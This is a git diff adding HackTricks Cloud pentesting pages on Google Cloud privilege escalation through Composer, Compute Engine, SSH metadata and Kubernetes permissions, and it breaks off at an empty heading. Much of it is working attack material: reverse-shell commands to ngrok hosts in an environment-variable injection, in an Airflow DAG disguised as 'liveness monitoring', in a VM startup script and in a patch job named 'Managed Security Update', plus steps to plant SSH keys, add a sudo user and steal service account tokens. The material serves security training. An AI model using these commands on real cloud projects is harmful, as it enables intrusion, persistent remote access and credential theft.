index 0000000000..5256742364
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
@@ -0,0 +1,159 @@
+# GCP - Composer Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## composer
+
+More info in:
+
+{% content-ref url="../gcp-services/gcp-composer-enum.md" %}
+[gcp-composer-enum.md](../gcp-services/gcp-composer-enum.md)
+{% endcontent-ref %}
+
+### `composer.environments.create`
+
+It's possible to **attach any service account** to the newly create composer environment with that permission. Later you could execute code inside composer to steal the service account token.
+
+```bash
+gcloud composer environments create privesc-test \
+  --project "${PROJECT_ID}" \
+  --location europe-west1 \
+  --service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"
+```
+
+More info about the exploitation [**here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh).
+
+### `composer.environments.update`
+
+It's possible to update composer environment, for example, modifying env variables:
+
+{% code overflow="wrap" %}
+```bash
+# Even if it says you don't have enough permissions the update happens
+gcloud composer environments update \
+    projects/<project-id>/locations/<location>/environments/<composer-env-name> \
+    --update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \
+    --location <location> \
+    --project <project-id>
+
+# Call the API endpoint directly
+PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
+Host: composer.googleapis.com
+User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
+Accept-Encoding: gzip, deflate, br
+Accept: application/json
+Content-Length: 178
+Content-Type: application/json
+X-Goog-Api-Client: cred-type/sa
+Authorization: Bearer [token]
+X-Allowed-Locations: 0x0
+
+{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
+```
+{% endcode %}
+
+TODO: Get RCE by adding new pypi packages to the environment
+
+### Download Dags
+
+Check the source code of the dags being executed:
+
+{% code overflow="wrap" %}
+```bash
+mkdir /tmp/dags
+gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
+```
+{% endcode %}
+
+### Import Dags
+
+Add the python DAG code into a file and import it running:
+
+{% code overflow="wrap" %}
+```bash
+# TODO: Create dag to get a rev shell
+gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
+```
+{% endcode %}
+
+Reverse shell DAG:
+
+{% code title="reverse_shell.py" %}
+```python
+import airflow
+from airflow import DAG
+from airflow.operators.bash_operator import BashOperator
+from datetime import timedelta
+
+default_args = {
+    'start_date': airflow.utils.dates.days_ago(0),
+    'retries': 1,
+    'retry_delay': timedelta(minutes=5)
+}
+
+dag = DAG(
+    'reverse_shell',
+    default_args=default_args,
+    description='liveness monitoring dag',
+    schedule_interval='*/10 * * * *',
+    max_active_runs=1,
+    catchup=False,
+    dagrun_timeout=timedelta(minutes=10),
+)
+
+# priority_weight has type int in Airflow DB, uses the maximum.
+t1 = BashOperator(
+    task_id='bash_rev',
+    bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',
+    dag=dag,
+    depends_on_past=False,
+    priority_weight=2**31 - 1,
+    do_xcom_push=False)
+```
+{% endcode %}
+
+### Write Access to the Composer bucket
+
+All the components of a composer environments (DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+
+Get more info about this attack in:
+
+{% content-ref url="gcp-storage-privesc.md" %}
+[gcp-storage-privesc.md](gcp-storage-privesc.md)
+{% endcontent-ref %}
+
+### Import Plugins
+
+TODO: Check what is possible to compromise by uploading plugins
+
+### Import Data
+
+TODO: Check what is possible to compromise by uploading data
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
new file mode 100644
index 0000000000..9a71037e86
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
@@ -0,0 +1,163 @@
+# GCP - Compute Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Compute
+
+For more information about Compute and VPC (netowork) in GCP check:
+
+{% content-ref url="../../gcp-services/gcp-compute-instances-enum/" %}
+[gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/)
+{% endcontent-ref %}
+
+{% hint style="danger" %}
+Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
+{% endhint %}
+
+### `compute.projects.setCommonInstanceMetadata`
+
+With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
+Limitations:
+
+* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
+* You will need to be **able to contact the SSH** server to login
+
+For more information about how to exploit this permission check:
+
+{% content-ref url="gcp-add-custom-ssh-metadata.md" %}
+[gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md)
+{% endcontent-ref %}
+
+You could aslo perform this attack by adding new startup-script and rebooting the instance:
+
+```bash
+gcloud compute instances add-metadata my-vm-instance \
+    --metadata startup-script='#!/bin/bash
+bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &'
+
+gcloud compute instances reset my-vm-instance
+```
+
+### `compute.instances.setMetadata`
+
+This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**.
+
+### `compute.instances.setIamPolicy`
+
+This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
+
+### **`compute.instances.osLogin`**
+
+If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance.
+
+{% hint style="success" %}
+In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
+{% endhint %}
+
+### **`compute.instances.osAdminLogin`**
+
+If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.
+
+{% hint style="success" %}
+In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
+{% endhint %}
+
+### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp`
+
+It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it.
+
+The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
+
+### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec`
+
+If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project.
+
+Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance.
+
+If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\
+For a patch job run:
+
+{% code overflow="wrap" %}
+```python
+cat > /tmp/patch-job.sh <<EOF
+#!/bin/bash
+bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1
+EOF
+
+gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh
+
+# Get the generation number
+gsutil ls -a gs://readable-bucket-by-sa-in-instance
+
+gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \
+  --instance-filter-names=zones/us-central1-a/instances/<instance-name> \
+  --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh#<generation-number> \
+  --reboot-config=never \
+  --display-name="Managed Security Update" \
+  --duration=300s
+```
+{% endcode %}
+
+To deploy a patch deployment:
+
+```bash
+gcloud compute os-config patch-deployments create <name> ...
+```
+
+The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working).
+
+**An attacker could also abuse this for persistence.**
+
+### `compute.machineImages.setIamPolicy`
+
+**Grant yourself extra permissions** to compute Image.
+
+### `compute.snapshots.setIamPolicy`
+
+**Grant yourself extra permissions** to a disk snapshot.
+
+### `compute.disks.setIamPolicy`
+
+**Grant yourself extra permissions** to a disk.
+
+### Bypass Access Scopes
+
+Following this link you find some [**ideas to try to bypass access scopes**](../).
+
+### Local Privilege Escalation in GCP Compute instance
+
+{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
+[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
new file mode 100644
index 0000000000..c762f6c84b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
@@ -0,0 +1,115 @@
+# GCP - Add Custom SSH Metadata
+
+## GCP - Add Custom SSH Metadata
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
+
+Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**.
+
+#### **Incorporation of SSH Keys into Custom Metadata**
+
+On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**.
+
+Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host.
+
+#### **Add SSH key to existing privileged user**
+
+1. **Examine Existing SSH Keys on the Instance:**
+   *   Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key.
+
+       ```bash
+       gcloud compute instances describe [INSTANCE] --zone [ZONE]
+       ```
+   * Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon.
+2. **Prepare a Text File for SSH Key Metadata:**
+   * Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones.
+3. **Generate a New SSH Key for the Target User (`alice` in this example):**
+   *   Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username.
+
+       ```bash
+       ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
+       ```
+   * Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata.
+4. **Update the Instance's SSH Key Metadata:**
+   *   Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command.
+
+       ```bash
+       gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
+       ```
+5. **Access the Instance Using the New SSH Key:**
+   *   Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example).
+
+       ```bash
+       ssh -i ./key alice@localhost
+       sudo id
+       ```
+
+#### **Create a new privileged user and add a SSH key**
+
+If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges:
+
+```bash
+# define the new account username
+NEWUSER="definitelynotahacker"
+
+# create a key
+ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
+
+# create the input meta file
+NEWKEY="$(cat ./key.pub)"
+echo "$NEWUSER:$NEWKEY" > ./meta.txt
+
+# update the instance metadata
+gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
+
+# ssh to the new account
+ssh -i ./key "$NEWUSER"@localhost
+```
+
+#### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
+
+It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide:
+
+1. **Apply SSH Keys at the Project Level:**
+   *   Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled.
+
+       ```bash
+       gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
+       ```
+2. **SSH into Instances Using Project-Wide Keys:**
+   * With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access.
+   * A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access.
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
new file mode 100644
index 0000000000..0599a6328a
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
@@ -0,0 +1,118 @@
+# GCP - Container Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## container
+
+### `container.clusters.get`
+
+This permission allows to **gather credentials for the Kubernetes cluster** using something like:
+
+```bash
+gcloud container clusters get-credentials <cluster_name> --zone <zone>
+```
+
+Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment.
+
+{% hint style="info" %}
+Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet.
+{% endhint %}
+
+If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this:
+
+```yaml
+apiVersion: v1
+clusters:
+- cluster:
+    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
+    server: https://34.123.141.28
+  name: gke_security-devbox_us-central1_autopilot-cluster-1
+contexts:
+- context:
+    cluster: gke_security-devbox_us-central1_autopilot-cluster-1
+    user: gke_security-devbox_us-central1_autopilot-cluster-1
+  name: gke_security-devbox_us-central1_autopilot-cluster-1
+current-context: gke_security-devbox_us-central1_autopilot-cluster-1
+kind: Config
+preferences: {}
+users:
+- name: gke_security-devbox_us-central1_autopilot-cluster-1
+  user:
+    auth-provider:
+      config:
+        access-token: <access token>
+        cmd-args: config config-helper --format=json
+        cmd-path: gcloud
+        expiry: "2022-12-06T01:13:11Z"
+        expiry-key: '{.credential.token_expiry}'
+        token-key: '{.credential.access_token}'
+      name: gcp
+```
+
+### `container.roles.escalate` | `container.clusterRoles.escalate`
+
+**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.
+
+**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions.
+
+### `container.roles.bind` | `container.clusterRoles.bind`
+
+**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour.
+
+**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions.
+
+### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update`
+
+All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\
+For more information check:
+
+As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used).
+
+### `container.secrets.get` | `container.secrets.list`
+
+As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
+
+### `container.pods.exec`
+
